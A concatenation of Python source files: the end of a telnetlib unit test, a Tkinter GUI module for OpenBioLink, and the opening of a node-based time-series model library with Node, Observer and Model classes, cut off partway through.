tl.IAC + tl.SB + tl.IAC + tl.IAC + tl.IAC + tl.SE,
tl.IAC + tl.SB + tl.IAC + tl.IAC + b'aa' + tl.IAC + tl.SE,
tl.IAC + tl.SB + b'bb' + tl.IAC + tl.IAC + tl.IAC + tl.SE,
tl.IAC + tl.SB + b'cc' + tl.IAC + tl.IAC + b'dd' + tl.IAC + tl.SE,
]
telnet = test_telnet(send)
nego = nego_collector(telnet.read_sb_data)
telnet.set_option_negotiation_callback(nego.do_nego)
txt = telnet.read_all()
self.assertEqual(txt, b'')
want_sb_data = tl.IAC + tl.IAC + b'aabb' + tl.IAC + b'cc' + tl.IAC + b'dd'
self.assertEqual(nego.sb_seen, want_sb_data)
self.assertEqual(b'', telnet.read_sb_data())
nego.sb_getter = None # break the nego => telnet cycle
def test_debuglevel_reads(self):
# test all the various places that self.msg(...) is called
given_a_expect_b = [
# Telnet.fill_rawq
(b'a', ": recv b''\n"),
# Telnet.process_rawq
(tl.IAC + bytes([88]), ": IAC 88 not recognized\n"),
(tl.IAC + tl.DO + bytes([1]), ": IAC DO 1\n"),
(tl.IAC + tl.DONT + bytes([1]), ": IAC DONT 1\n"),
(tl.IAC + tl.WILL + bytes([1]), ": IAC WILL 1\n"),
(tl.IAC + tl.WONT + bytes([1]), ": IAC WONT 1\n"),
]
for a, b in given_a_expect_b:
telnet = test_telnet([a])
telnet.set_debuglevel(1)
txt = telnet.read_all()
self.assertIn(b, telnet._messages)
return
def test_debuglevel_write(self):
telnet = test_telnet()
telnet.set_debuglevel(1)
telnet.write(b'xxx')
expected = "send b'xxx'\n"
self.assertIn(expected, telnet._messages)
def test_debug_accepts_str_port(self):
# Issue 10695
with test_socket([]):
telnet = TelnetAlike('dummy', '0')
telnet._messages = ''
telnet.set_debuglevel(1)
telnet.msg('test')
self.assertRegex(telnet._messages, r'0.*test')
class ExpectTests(ExpectAndReadTestCase):
def test_expect(self):
"""
expect(expected, [timeout])
Read until the expected string has been seen, or a timeout is
hit (default is no timeout); may block.
"""
want = [b'x' * 10, b'match', b'y' * 10]
telnet = test_telnet(want)
(_,_,data) = telnet.expect([b'match'])
self.assertEqual(data, b''.join(want[:-1]))
if __name__ == '__main__':
unittest.main()
|
gui.py
|
import os
import sys
import threading
import tkinter as tk
from tkinter import font as tkfont, messagebox
from tkinter.ttk import Style
from openbiolink import openBioLink
from openbiolink.gui.confirmFrame import ConfirmFrame
from openbiolink.gui.console import ConsoleFrame
from openbiolink.gui.graphCreationFrame import GraphCreationFrame
from openbiolink.gui.splitFrame import SplitFrame
from openbiolink.gui.startPage import StartPage
app = None
class BimegGui(tk.Tk):
ARGS_LIST_GLOBAL = []
ARGS_LIST_GRAPH_CREATION = []
ARGS_LIST_TRAIN_TEST_SPLIT = []
ARGS_LIST_EVAL = []
def __init__(self, *args, **kwargs):
tk.Tk.__init__(self, *args, **kwargs)
# Define Fonts
self.title_font = tkfont.Font(family="Helvetica", size=18, weight="bold", slant="italic")
self.info_font = tkfont.Font(family="Helvetica", size=7, slant="italic")
# Define base container
self.container = tk.Frame(self)
# self.wm_geometry('600x470')
self.container.pack(side="top", fill="both", expand=True)
self.container.grid_rowconfigure(0, weight=1)
self.container.grid_columnconfigure(0, weight=1)
# Initialize all frames
self.frames = {}
for F in (StartPage, GraphCreationFrame, SplitFrame, ConfirmFrame, ConsoleFrame):
page_name = F.__name__
frame = F(parent=self.container, controller=self)
self.frames[page_name] = frame
frame.grid(row=0, column=0, sticky="nsew")
self.args = []
self.selected_frames = ["ConfirmFrame"]
self.next_frame_index = 0
self.show_frame("StartPage")
def set_selected_frames(self, selected_frames):
self.selected_frames = selected_frames + self.selected_frames
def show_next_frame(self):
if self.next_frame_index == len(self.selected_frames):
self.start()
else:
self.show_frame(self.selected_frames[self.next_frame_index])
self.next_frame_index += 1
def show_previous_frame(self):
if self.next_frame_index == 1:
self.next_frame_index = 0
self.show_frame("StartPage")
self.selected_frames = ["ConfirmFrame"]
else:
self.next_frame_index -= 1
self.show_frame(self.selected_frames[self.next_frame_index - 1])
def show_frame(self, page_name):
""" Show a frame for the given page name """
frame = self.frames[page_name]
frame.controller = self
frame.update()
frame.tkraise()
def start(self):
""" start script and close gui"""
if messagebox.askokcancel("Start", "Do you want to start now?"):
self.show_frame("ConsoleFrame")
def _main(*args_lists):
for arg_list in args_lists:
openBioLink.main(arg_list)
args = [
list(self.ARGS_LIST_GLOBAL) + list(args)
for args in (self.ARGS_LIST_GRAPH_CREATION, self.ARGS_LIST_TRAIN_TEST_SPLIT, self.ARGS_LIST_EVAL)
if args
]
thread = threading.Thread(target=_main, args=args, daemon=True)
thread.start()
# fixme start detached
# app.destroy()
#################### ASK FOR EXIT ############################
class AskForExitPopup:
def __init__(self, message):
self.exit = False
win = self.win = tk.Toplevel()
l = tk.Label(self.win, text=message)
l.grid(row=0, column=0)
b1 = tk.Button(win, text="Cancel", command=self.cancel)
b2 = tk.Button(win, text="Continue", command=self.go_on)
b1.grid(row=1, column=0)
b2.grid(row=1, column=1)
win.wait_window()
def cancel(self):
self.win.destroy()
self.exit = True
def go_on(self):
self.win.destroy()
self.exit = False
def askForExit(message):
popup = AskForExitPopup(message)
if popup.exit:
on_closing()
#################### SKIP EXISTING FILES ############################
class SkipExistingFilesPopup:
def __init__(self, file_path):
self.skip = None
self.for_all = False
self.win = tk.Toplevel()
message = "The file %s already exists" % (file_path)
l = tk.Label(self.win, text=message)
button_panel = tk.Frame(self.win)
go_on_button = tk.Button(button_panel, text="continue anyways", command=self.go_on)
go_on_all_button = tk.Button(button_panel, text="continue anyways for all files", command=self.go_on_for_all)
skip_button = tk.Button(button_panel, text="skip this file", command=self.skip_this)
skip_all_button = tk.Button(button_panel, text="skip all existing files", command=self.skip_all)
exit_button = tk.Button(button_panel, text="exit", command=self.exit)
l.pack(side="top")
button_panel.pack(side="top")
go_on_button.pack(side="left")
go_on_all_button.pack(side="left")
skip_button.pack(side="left")
skip_all_button.pack(side="left")
exit_button.pack(side="left")
self.win.wait_window()
def exit(self):
self.win.destroy()
self.skip = None
self.for_all = None
def go_on(self):
self.win.destroy()
self.skip = None
self.for_all = False
def go_on_for_all(self):
self.win.destroy()
self.skip = False
self.for_all = True
def skip_this(self):
self.win.destroy()
self.skip = True
self.for_all = False
def skip_all(self):
self.win.destroy()
self.skip = True
self.for_all = True
def skipExistingFiles(file_path):
skip = None
for_all = False
if os.path.isfile(file_path):
popup_response = SkipExistingFilesPopup(file_path)
skip = popup_response.skip
for_all = popup_response.for_all
if skip is None and for_all is None:
on_closing()
return skip, for_all
#################### MAIN GUI ############################
def on_closing():
if messagebox.askokcancel("Quit", "Do you really want to quit?"):
app.destroy()
sys.exit()
def show_info_box(msg):
if not bool(msg):
msg = "No info available"
messagebox.showinfo("Info", msg)
def start_gui():
global app
app = BimegGui()
app.style = Style()
app.protocol("WM_DELETE_WINDOW", on_closing)
app.mainloop()
|
model.py
|
import glob
import json
import copy
import importlib
import threading
import logging
import pytz
#for tables
import numpy
import numpy as np
import datetime
import dateutil.parser
import sys
import os
import time
import uuid
import hashlib
import random
import traceback
from dates import *
# type hints
from typing import List
import modeltemplates
# for Observer
from queue import Queue
from queue import Empty
import utils
from timeseries import TimeSeriesTable
from dates import *
import inspect
from utils import str_lim
"""
next Todo
-
- execute: problem im thread mit der Ausführung
- code documentation
- google document
-
"""
sys.path.append("./plugins") #for the importlib loader, doesn't understand relative paths
#sys.path.append("./private") #for the importlib loader, doesn't understand relative paths
myGlobalDir = os.path.dirname(os.path.realpath(__file__)) # holds the directory of this script
def getRandomId():
return '%08x' % random.randrange(16 ** 8)
#used as an OOP wrapper for the flat and procedural style of the model class
class Node():
""" used as an OOP wrapper for the flat and procedural style of the model class
it is a convenient way to access nodes and their hierarchy and internals
"""
def __init__(self,myModel,myId):
""" a node can be created by calling the
mynode = model.get_node("root.mynode") or
mynode = Node(mymodel,"123")
Returns:
a node object for further access to values, hierarchy etc.
"""
self.model = myModel # this is not a copy!!
self.id = myId
def __repr__(self):
return 'Node(id={:}, value={:})'.format(self.id, self.get_value())
def get_value(self):
""" Returns:
the "value" property of the node
None if node has no "value"
"""
return self.model.get_value(self.id)
#####################
# time series node API
def get_time_series(self, start=None,
end=None,
noBins=None,
includeIntervalLimits=False,
resampleTimes=None,
format="default",
toList = False,
resampleMethod = None):
"""
Returns
dict with ["__time":[...],"values":[...]
"""
browsePath = self.model.get_browse_path(self.id)
data = self.model.time_series_get_table(variables = [browsePath],
tableDescriptor=None,
start=start,
end=end,
noBins=noBins,
includeIntervalLimits=includeIntervalLimits,
resampleTimes=resampleTimes,
format=format,
toList=toList,
resampleMethod=resampleMethod)
if data !={} :
return data[browsePath]
else:
return None
def get_raw_time_series(self,start=None,end=None):
return self.model.time_series_get_raw(self.id,start=start,end=end)
def add_references(self,targetNodes,deleteAll=False):
"""
add references from the node to the targets
Args:
targetNodes: node or list of nodes to reference to
deleteAll: if set true, we delete all existing references before creating the new
Returns
True/False for success/error
"""
if deleteAll:
self.model.remove_forward_refs(self.id)#this deletes all existing
if type(targetNodes) is not list:
targetNodes = [targetNodes]
targetIds = [node.get_id() for node in targetNodes]
return self.model.add_forward_refs(self.id,targetIds)
def set_value(self,value):
"""
special support for "column" types: if a scalar is given, we make a "full" array
"""
if self.get_properties()["type"] == "column":
if type(value) != numpy.ndarray and type(value) != list:
#we have a scalar, so we set it
#get the len of the table
timeNode = self.get_table_time_node()
length = len(timeNode.get_value())
value = numpy.full(length,value,dtype=numpy.float64)
return self.model.set_value(self.id,value)
def set_time_series(self,values=None,times=None):
"""
replaces the time series with value and times, it deletes the existing
"""
return self.model.time_series_set(self.id,values=values,times=times)
def insert_time_series(self,values=None,times=None,allowDuplicates = False):
"""
insert data, if the time stamp exists already, we replace it
"""
return self.model.time_series_insert(self.id,values=values, times=times, allowDuplicates=allowDuplicates)
def merge_time_series(self,values=None, times=None):
""" merge the times series of mergeNode into this node"""
return self.model.time_series_merge(self.id,values = values,times=times)
def delete_time_series(self,start=None,end=None):
return self.model.time_series_delete_area(self.id, start=start, end=end)
#####################
# event series node API
def get_event_series(self, start=None, end=None, format="default",eventFilter = None):
return self.model.event_series_get(self.id,start=start,end=end,format=format,eventFilter=eventFilter)
def set_event_series(self, values=None, times=None):
"""
replaces the event series with value and times, it deletes the existing
"""
return self.model.event_series_set(self.id,values=values,times=times)
def insert_event_series(self,values=None,times=None,allowEventDuplicates = False):
return self.model.event_series_insert(self.id,values,times,allowEventDuplicates=allowEventDuplicates)
def delete_event_series(self,start=None, end = None, eventsToDelete=[]):
return self.model.event_series_delete(desc=self.id,start=start,end=end,eventsToDelete=eventsToDelete)
def get_parent(self):
""" Returns:
a Node()-instance of the parent of the current node,
None if no parent available
"""
nodeInfo = self.model.get_node_info(self.id)
if nodeInfo:
return self.model.get_node(nodeInfo["parent"])
else:
return None
def get_child(self,childName):
"""
Args:
childName(nodedescription):
Returns:
a Node() instance of the child holding the childName
None if the current node does not have a child with the name childName
"""
nodeInfo = self.model.get_node_info(self.id)
if nodeInfo:
for childId in nodeInfo['children']:
childInfo = self.model.get_node_info(childId)
if childInfo["name"] == childName:
return self.model.get_node(childId)
return None
def delete(self):
"""
delete this node from the model, note that the object itself it not destroyed, but it is disconnected from the model
so should not be used anymore afterwards
:return:
"""
return self.model.delete_node(self.id)
def create_child(self,name=None,type="folder",value=None,properties={}):
"""
create a node under the current node, if the node exists already, we get the node
Args:
name [string] the child name
type [string] the type of the node
value [any] direct assignment of values
properies [dict] a dict with further settings of properies like value, type etc
Returns:
the node objects or none if not available
"""
if name == None:
name = '%08x' % random.randrange(16 ** 8)
id = self.model.create_node(parent=self.id,name=name,type=type,value=value,properties=properties)
if id:
return self.model.get_node(id)
else:
#we try to get it anyways
return self.get_child(name)
def get_children(self, deepLevel=1):
""" Returns:
a list of Node()-objects which are the children of the current node
args:
deepLevel: set >1 to get children and childrens' children
"""
nodeInfo = self.model.get_node_info(self.id)
children = []
if nodeInfo["children"]:
children=[self.model.get_node(id) for id in nodeInfo['children'] ]
while deepLevel>1:
deepLevel -=1
childrenOld = children.copy()
for child in childrenOld:
children.extend(child.get_children())
#remove dublicates via id:
childDict = {child.get_id():child for child in children} # same keys(id) will only be there once
children = list(childDict.values())
return children
def get_properties(self):
""" Returns:
a dictionary holding the properties of the node like {"value":123,"name":"myVariable","children":...}
"""
nodeInfo = self.model.get_node_info(self.id)
return copy.deepcopy(nodeInfo)
def get_type(self):
"""
Retuns:
the type of the node
"""
return self.get_property("type")
def get_property(self,property):
"""
Args:
property: the property name asked for
Returns:
the value of the property behind the property given
None if the property does not exist
"""
nodeDict =self.get_properties()
if property in nodeDict:
return self.get_properties()[property]
else:
return None
def set_properties(self,properties):
"""
add or modify properties of a node
Args:
properties [dict] holding key,value for the properties
Returns
True for ok, False for not done
"""
return self.model.set_properties(properties,nodeDesc=self.id)
def get_model(self):
""" this function should only be used for testing, we should never be in the need to access the model inside
Returns:
the underlying model of type Model() class
"""
return self.model
def get_target_ids(self):
""" this function returns the target ids of a referencer as a list, not resolving the leaves"""
if self.get_properties()["type"] != "referencer":
return None
return self.get_properties()["forwardRefs"]
def get_target(self):
""" this function returns the first direct taret node of a referencer not resolving the leaves"""
if self.get_properties()["type"] == "referencer":
targets = self.get_properties()["forwardRefs"]
if targets:
return Node(self.model,targets[0])
return None
def get_targets(self):
""" this function returns the target Nodes of a referencer as a list, not resolving the leaves"""
if self.get_properties()["type"] != "referencer":
return None
targets = []
for nodeid in self.get_properties()["forwardRefs"]:
targets.append(Node(self.model,nodeid))
return targets
def get_leaves(self):
""" this function returns a list of Nodes containing the leaves where this referencer points to
this functions works only for nodes of type "referencer", as we are following the forward references
leaves are defined as following:
1) all nodes that are listed under the forward references and which are not of type referencer or folder
2) if nodes pointed to are referencer, the targets are again analyzed
3) if a node pointed to is a folder, all children of the folder are taken which are not referencer or folder themselves
folders and referencers inside the folder are not taken into account
doing so, hierarchies of referencers are unlimited, hierarchies of folders are only of depth 1
Returns:
all nodes which are considered leaves as a list of Node() objects
"""
leaves = self.model.get_leaves(self.id) # a list of node dicts
leaveNodes = []
for leave in leaves:
leaveNodes.append(Node(self.model,leave["id"]))
return leaveNodes
def get_leaves_ids(self):
"""
get the list of ids of the leaves, see get_leaves()
Returns:
a list of ids of the leaves
"""
return self.model.get_leaves_ids(self.id)
def get_id(self):
""" Returns: the nodeid (which is generated by the system) """
return self.id
def get_browse_path(self):
""" Returns: the browsepath along the style "root.myfolder.myvariable..." """
return self.model.get_browse_path(self.id)
def get_name(self):
""" Returns: the name of the node without the path """
return self.model.get_node_info(self.id)["name"]
def get_node(self,desc):
return self.model.get_node(desc)
def get_table_time_node(self):
""" if the current node belongs to a table, then we can get the time node
a node
Returns:
(obj Node()) the node of type
"""
timeNode = self.model.find_table_time_node(self.id)
if timeNode:
return Node(self.model,timeNode)
else:
return None
def get_table_len(self):
"""
if the current node is a type "table", we get the current len
Return:
the len of the columns of the table
"""
return self.model.get_table_len(self.id)
def get_table_node(self):
"""
if the current node is a column of a time series table, we get the according table node of type "table"
Return:
a Node() of type "table" which is the table of the current node
"""
tableId = self.model.find_table_node(self.id)
if tableId:
return self.model.get_node(tableId)
else:
return None
def get_time_indices(self,startTime,endTime):
""" works only for the time node, it looks to find the timeField node of the table to which the node belongs
then tries to find start and end time inside the timeField column and returns the index (rownumber) which are
INSIDE the given startTime, endTime
Args:
startTime: the startTime to look up ,supported formats: epoch seconds, datetime object, iso string
endTime: the startTime to look up ,supported formats: epoch seconds, datetime object, iso string
Returns:
(numpy array) indexnumbers containing the rows of the table that fall inside the given [startTime, endTime] intervall
None for not finding table, timeField, start-endTimes whatsoever
"""
try:
startTime = date2secs(startTime)
endTime = date2secs(endTime)
times = numpy.asarray(self.get_value())
indices = numpy.where((times >= startTime) & (times <= endTime))[0]
return indices
except:
return None
def execute(self):
return self.model.execute_function(self.id)
def execute_synchronous(self):
return self.model.execute_synchronous(self.id)
def instantiate(self):
return self.model.instantiate_object(self.id)
def get_object(self):
return self.model.get_object(self.id)
def get_logger(self):
return self.model.logger
def connect_to_table(self,tableNode):
"""
connect a node to a table, it must be a column type
the node itself will be reset and filled with numpy.inf and prepared to work with the table:
an array will be created with np.inf of the current table size
and the column will be hooked to the table referencer
Returns:
True on success
"""
if self.get_property("type") != "column":
return False
#now make an array of np.inf of the current table size and apply the value
timeNode = tableNode.get_table_time_node()
if not timeNode:
return False
tableLen = len(timeNode.get_value())
self.set_value(numpy.full(tableLen,numpy.inf,dtype=numpy.float64))
#now hook it as column to the table
#check if we are part of it already
for column in tableNode.get_child("columns").get_leaves():
if column.get_id() == self.get_id():
return True
#now connect it to the table
return self.model.add_forward_refs(tableNode.get_child("columns").get_id(), [self.id],allowDuplicates=False)
def get_columns(self):
"""
get the columns nodes of a table without the time node
can be executed on the table node
Returns:
list of node objects which are the columns of the table without the time node
"""
if self.get_properties()["type"] != "table":
return None
nodes = self.get_child("columns").get_leaves()
timeNode = self.get_table_time_node()
return [node for node in self.get_child("columns").get_leaves() if node.get_id() != timeNode.get_id()]
class Observer:
# The observer needs a reference to the model, because the rest service is not able to detect
# when the client connection is closed, but the observer message handling loop can detect it
# this way the observer can detach itself from the model, when the client is disconnected
# there are two queues involved: the updateQueue holding events pushed by the observers from the model
# and the eventQueues which is the filtered updateQueue (filtering avoids sending multiple identical events in short time
def __init__(self, model):
self.model = model
# Message queues to store the new events and last time stamps
self.updateQueue = Queue()
self.eventQueues = {} # k,v = event:{"lasttimestamp":datetime,"queue":Queue()
self.minWaitTime = 0.500 #in seconds float
# use the logger of th model
self.logger = self.model.logger
self.lock = threading.RLock()
#preload queue: this is a workaround as the browser does not get the first 2 events immideately
# it actually doesn't help ..?
for i in range(2):
self.updateQueue.put({"event":"_preload","id":"","data":{"xy":str(i)}})
def update(self, event):
"""
inform about the occurrence of an event,
Args:
event "string": the
:param event:
:return:
"""
defaultEvent = {"data":"","id":"","event":""}
defaultEvent.update(event)
self.updateQueue.put(defaultEvent)
#self.logger.debug(f"Qup {id(self)} {defaultEvent['event']}, {defaultEvent['id']}")
def get_event(self):
"""
get the next event from the observerclass, this is used a generator for the webserver
we also filter out events to avoid a train of identical events
the filtering uses the self.minWaitTime, within that period we don't sent identical event;
events are "identical", if they have the same "event" and "data"
"""
self.logger.debug(f"Observer {id(self)} get_event()")
stop_event_processing = False # This flag shows when to stop the event processing
while not stop_event_processing:
try:
# Try to retrieve an item from the update queue
event = self.updateQueue.get(block=True,timeout=self.minWaitTime)
#self.logger.debug(f"event pick {event}")
#create an eventIdentification, this is used to filter out repeated events
# we select the eventIdentificton in a way that events that have unique information keeps them
# we take all information from the event.data field, so only the events WITHOUT unique data will be removed
# those are typically the tree.update events
eventIdentification = event["event"] #the event name itself
for key in event["data"]:
eventIdentification = eventIdentification+str(key)+str(event["data"][key])
#now sort this event into the queues of eventids
if eventIdentification not in self.eventQueues:
# this is a new type/identificatin of event, create an entry in the event queue
# put the event in the queue and make the last timestamp so that we send it out now
self.eventQueues[eventIdentification]={"lastTimeStamp":0,"queue":Queue()}
self.eventQueues[eventIdentification]["queue"].put(event)
except Exception as ex:
# this happens if we time out the queue get, no problem, just continue
#self.logger.error(f"Exception observer {id(self)} thread self.updateQueue.get: {ex},{str(sys.exc_info()[0])}")
pass
#now go over all the sorted event queues and check what to send out:
if 0:
#show the queues
for k,v in self.eventQueues.items():
q = v["queue"]
qLen = q.qsize()
#self.logger.debug(f"Queue {k}: len {qLen} {[q.queue[id] for id in range(qLen)]}")
try:
now = time.time()
for eventIdentification,entry in self.eventQueues.items(): # entry is {"lasttimestampe": "queue":
#self.logger.debug(f"observer {id(self)} check queue of {eventIdentification} size: {entry['queue'].qsize()},last:{entry['lastTimeStamp']}, now:{now}, ready: {now > (entry['lastTimeStamp']+self.minWaitTime)}")
if (not entry["queue"].empty()) and (now > (entry["lastTimeStamp"]+self.minWaitTime)):
#send this event, the timeout was met, we pull the first event from the queue, trash the remaining ones
"""
old code
self.eventQueues[eventIdentification]["lastTimeStamp"]=now
#send out this event
myEvent = self.eventQueues[eventIdentification]["queue"].get()
event_string = f'id:{myEvent["id"]}\nevent: {myEvent["event"]}\ndata: {myEvent["data"]}\n\n'
self.logger.debug(f'Observer {id(self)} sending event: {event_string}')
#pull empty the queue
if self.eventQueues[eventIdentification]['queue'].qsize():
self.logger.debug(f"Qtrash observerinstance{id(self)} eventident {eventIdentification} size {self.eventQueues[eventIdentification]['queue'].qsize()}")
while not self.eventQueues[eventIdentification]["queue"].empty():
self.eventQueues[eventIdentification]["queue"].get(False)
self.logger.debug(f"Qyield {id(self)} : {myEvent}")
yield event_string
"""
self.eventQueues[eventIdentification]["lastTimeStamp"]=now
#send out this event
#pull empty the queue
if self.eventQueues[eventIdentification]['queue'].qsize():
#self.logger.debug(f"Qtrash observerinstance{id(self)} eventident {eventIdentification} size {self.eventQueues[eventIdentification]['queue'].qsize()}")
while not self.eventQueues[eventIdentification]["queue"].empty():
myEvent = self.eventQueues[eventIdentification]["queue"].get(False)
event_string = f'id:{myEvent["id"]}\nevent: {myEvent["event"]}\ndata: {json.dumps(myEvent["data"])}\n\n'
#self.logger.debug(f"Qyield {id(self)} : {myEvent}")
yield event_string
# This exception is raised when the generator function is exited, which means that the
# client side connection to the SSE stream was close, thus the observer could be removed
except GeneratorExit:
self.logger.warning(f"Observer {id(self)} connection closed.")
stop_event_processing = True
self.logger.warning(f"Observer {id(self)} exiting event processing.")
# Detach this observer from the model
self.model.detach_observer(self)
class Model:
nodeTemplate = {"id": None, "name": None, "type": "folder", "parent": None, "children": [], "backRefs": [],"forwardRefs":[],"value":None}
def __init__(self):
"""
initialize an empty Model object, it will contain the root Node as folder with Id "0"
during the initialization, also the plug-ins (all files in the ./plugin) are loaded:
all templates and functions are imported
a model holds all modelling information and data to work on
"""
self.version = 0.1
self.model = {"1":{
"name":"root",
"type":"folder",
"children":[],
"parent":"0",
"id":"1",
"backRefs":[],
"forwardRefs":[],
"version":self.version
}}
self.disableObserverCounter = 0 # a counting sema (under manual lock) for the disabling: if zero the notify_observers is active otherwise not
self.__init_logger(logging.DEBUG)
self.globalIdCounter=1 # increased on every creation of a node, it holds the last inserted node id
self.idCreationHash = True # if this is true, we create the id per hash, not per counter
self.ts = TimeSeriesTable()
self.functions={} # a dictionary holding all functions from ./plugins
self.templates={} # holding all templates from ./plugins
self.lock = threading.RLock()
self.executeFunctionRunning = False # set to true, makes sure only one functions runs at a time
self.objectClasses = {} # a dictionaryholding all object clases from the /plugins
self.import_default_plugins()
self.differentialHandles ={} # containing model_copy entries to support differential queries
self.diffHandleCounter = 0 # used only for debugging
self.differentialHandlesMaxPerUser = 10
self.currentModelName = "emptyModel" # the current name of the model
self.modelUpdateCounter = 0 #this is for the tree observer, on any change, we update the counter
self.observerStatus = {} # a dict holding the key = observerid and value : the needed status of an observer processing
self.executionQueue = Queue()
self.observers = []
self.sse_event_id = 1
self.start_function_execution_thread()
def __del__(self):
self.functionExecutionRunning = False # stop the execution thread of functions
def __init_logger(self, level):
"""setup the logger object"""
self.logger = logging.getLogger("Model-"+'%08x' % random.randrange(16 ** 8))
handler = logging.StreamHandler()
formatter = logging.Formatter('%(asctime)s %(name)-12s %(levelname)-8s %(message)s')
handler.setFormatter(formatter)
self.logger.addHandler(handler)
logfile = logging.FileHandler("./log/model.log")
logfile.setFormatter(formatter)
self.logger.addHandler(logfile)
self.logger.setLevel(level)
def __get_id(self, id):
"""
Args:
id (string): give a browsepath ("root.myfolder.myvariable") or a nodeId ("10")
or a "fancy" path mixed like "1000.min" where 1000 is a node id, only the first is allowed as Nodeid, the followings are names
Returns:
(string): the node id as string
None if not found
"""
if id in self.model:
return id
#maybe a browsepath?
try:
names = id.split('.')
if names[0]=="root":
names = names[1:]
actualSearchId = "1"
elif names[0] in self.model:
#self.logger.debug(f"fancy browsepath {names}")
actualSearchId = names[0]
names = names[1:]
else:
return None
except:
return None
#now we start at root
for name in names:
nextSearchId = None
for childId in self.model[actualSearchId]["children"]:
if self.model[childId]["name"] == name:
#this is a match
nextSearchId = childId
break
if not nextSearchId:
return None
#we found it, go deeper now
actualSearchId = nextSearchId
return actualSearchId
def get_node(self,desc):
""" instantiate a Node() object on the node given as desc
Args:
desc (string): give a browsepath ("root.myfolder.myvariable") or a nodeId ("10")
Returns:
(Node()): a node object of the given node
None if not found
"""
with self.lock:
id = self.__get_id(desc)
if id:
return Node(self,id)
def find_node(self,search,matchProperty={}):
"""
the search is a match pattern for the path, we return the first match
with
"""
with self.lock:
for id in self.model:
if search in self.get_browse_path(id):
if matchProperty!={}:
for k,v in matchProperty.items():
if k not in self.model[id]:
continue
if self.model[id][k]!=v:
continue
return Node(self,id)
return Node(self,id)
return None
def find_nodes(self,search,matchProperty={}):
"""
the search is a match pattern for the path, we return all matches as nodes
"""
found = []
with self.lock:
for id in self.model:
if search in self.get_browse_path(id):
if matchProperty!={}:
for k,v in matchProperty.items():
if k not in self.model[id]:
break
if self.model[id][k]!=v:
break
found.append(Node(self,id))
return found
def get_node_info(self,desc,includeLongValues=True):
"""
Args:
desc (string): give a browsepath ("root.myfolder.myvariable") or a nodeId ("10")
includeLongValue if true, we include values for columns and files
Returns:
(dict): a dictionary holding all properties of the node includin references and children
"""
with self.lock:
id = self.__get_id(desc)
if not id: return None
#we do not include values of columns and files
if self.model[id]["type"] in ["column","file","timeseries"]:
if includeLongValues:
return copy.deepcopy(self.model[id])
else:
return {k:v for k,v in self.model[id].items() if k!="value"}
elif self.model[id]["type"]== "object":
return {k: v for k, v in self.model[id].items() if k != "object"} # don't take the "object" key
else:
#take all
return copy.deepcopy(self.model[id])
def __get_node_with_children(self,id,nodes,includeForwardRefs=True):
"""
recursive helper for get_branch
"""
if self.model[id]["type"] in ["file","column","timeseries"]:
#we do not take these values
nodes[id]={k:v for k,v in self.model[id].items() if k!="value"} # copy the whole but leave out the value
elif self.model[id]["type"] == "referencer":
nodes[id] = self.model[id]
if includeForwardRefs:
#for referencers, we take the direct targets
for targetId in self.model[id]["forwardRefs"]:
if self.model[targetId]["type"] in ["file", "column","timeseries"]:
# we do not take these values
target = {k: v for k, v in self.model[id].items() if k != "value"} # copy the whole but leave out the value
else:
target = copy.deepcopy(self.model[targetId])
#xxx todo, we might take the wrong backrefs with us, also these target nodes might not have their parent here
nodes[targetId]=target
else:
nodes[id]=self.model[id]
for child in self.model[id]["children"]:
nodes.update(self.__get_node_with_children(child,nodes,includeForwardRefs))
return nodes
def get_branch(self,desc,includeRoot=True,includeForwardRefs=True):
"""
get a branch of the model starting from desc including all children excluding:
columns
files
for referencers, we do not follow deep search for leaves, we just include the first level referenced nodes
referencers poiting to nodes that are not part of the branch will also be included
Returns:
a list of nodedicts that can be used as a full valid model again
"""
with self.lock:
id = self.__get_id(desc)
if not id: return None
nodes = {}
nodes.update(self.__get_node_with_children(id,nodes,includeForwardRefs))
#now we also need all nodes to the desc
if includeRoot:
while self.model[id]["parent"]!="0":
#the parent is not invalid so take the parent, we don't make further check for files and otheres
parentId = self.model[id]["parent"]
parentNode = copy.deepcopy(self.model[parentId])
parentNode["children"]=[id] # the other side-children are not of interest
nodes.update({parentId:parentNode})
id = self.model[id]["parent"]
return copy.deepcopy(nodes)
def __get_node_with_children_pretty(self,id,depth = None,ignore = []):
"""
recursive helper for get_branch_pretty
args:
nodes: the nodes so far
"""
#t=utils.Profiling(f"id {self.get_browse_path(id)}, ignore = {ignore}")
result = {}
node = self.model[id]
#create my properties
props = {k: copy.deepcopy(v) for k, v in node.items() if k not in ["value", "backRefs", "children"]}
if node["type"] not in ["file", "column","timeseries"]:
# we also take the value then
props["value"] = copy.deepcopy(node["value"])
if node["type"] == "referencer" and (depth is None or depth>0):
#tt = utils.Profiling("get leaves")
leaves = self.get_leaves_ids(id)
#print(tt)
#tt.start("get leaves data")
forwards = [self.get_browse_path(leaf) for leaf in leaves]
props["leaves"]=forwards
#tt.lap("1")
props["targets"] = [self.get_browse_path(id) for id in self.model[id]["forwardRefs"]]
props["leavesIds"]=leaves
props["leavesValues"] = [self.get_value(id) if self.model[id]["type"] not in ["file","column","timeseries"] else None for id in leaves]
#tt.lap("2")
validation = []
props["leavesProperties"]={}
for id in leaves:
prop = self.get_node_info(id,includeLongValues=False)
if "validation" in prop:
validation.append(prop["validation"])
else:
validation.append(None)
props["leavesProperties"][id]=prop
props["leavesProperties"][id]["browsePath"]=self.get_browse_path(id)
#tt.lap("3")
props["leavesValidation"] = validation
#print(tt)
#make sure we have the browsepath on board
if "browsePath" not in props:
props["browsePath"]=self.get_browse_path(id)
result[".properties"]=props
if depth is None or depth>0:
#now the children
nextDepth = None
if depth is not None:
nextDepth = depth -1
for childId in node["children"]:
childPath = self.get_browse_path(childId)
if any([ignoreName in childPath for ignoreName in ignore]):
#self.logger.debug(f"ignore {childPath}")
pass
else:
result[self.model[childId]["name"]]=self.__get_node_with_children_pretty(childId,nextDepth,ignore)
#print(t)
return result
def get_branch_pretty(self,desc,depth=None,ignore = []):
"""
get a branch in the form
"child1":{"child3":... ".type":, ".value"
"child2":{
the properties occurr in ".property" style, the children are direct entries
we only use names
for the referencers, the ".forwardRefs" are the leaves with full path: ["root.folder1.tzarget2","root.varibale.bare"..]
Args:
desc [string] the root node to start from
depth [int] the depth to look into
"""
with self.lock:
#p=utils.Profiling("get_branch_pretty")
id = self.__get_id(desc)
if not id: return None
res = self.__get_node_with_children_pretty(id,depth,ignore)
#self.logger.debug(p)
return res
def get_node_with_children(self,desc):
""" retrieve node information including children of the first level
Args:
desc (string): give a browsepath ("root.myfolder.myvariable") or a nodeId ("10")
Returns:
(Node()): a node object of the given node including the browsepath
None if not found
"""
with self.lock:
